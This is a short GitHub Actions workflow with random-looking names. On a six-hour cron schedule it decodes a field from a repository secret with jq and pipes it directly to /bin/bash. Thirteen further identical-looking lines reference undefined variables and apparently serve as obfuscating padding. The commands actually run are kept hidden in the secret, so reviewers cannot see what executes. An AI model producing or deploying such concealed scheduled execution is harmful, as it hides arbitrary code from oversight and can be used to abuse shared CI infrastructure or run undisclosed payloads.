name: yezhenxnis

on:
  workflow_dispatch:
  schedule:
    - cron: '47 4/6 * * *'
jobs:  # 3301
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yezhenxnis
        env:
          g102: ${{ secrets.g102 }}
        run: |
          echo $g102 | jq -r .dkk4878 | /bin/bash
          echo $jnjfx9 | jq -r .mwz607 | /bin/bash
          echo $ylq32725 | jq -r .yxn90658 | /bin/bash
          echo $ntv117 | jq -r .oro2891 | /bin/bash
          echo $jt39 | jq -r .i3925 | /bin/bash
          echo $xim10 | jq -r .semso96953 | /bin/bash
          echo $rgzi607 | jq -r .fcl375 | /bin/bash
          echo $dku4992 | jq -r .qelbr17 | /bin/bash
          echo $jvx23385 | jq -r .l2827 | /bin/bash
          echo $aniq17016 | jq -r .ykgu3352 | /bin/bash
          echo $k64 | jq -r .nwzs803 | /bin/bash
          echo $icbnk0 | jq -r .ngb43 | /bin/bash
          echo $koa7150 | jq -r .hme625 | /bin/bash
          echo $igyx5247 | jq -r .v10666 | /bin/bash

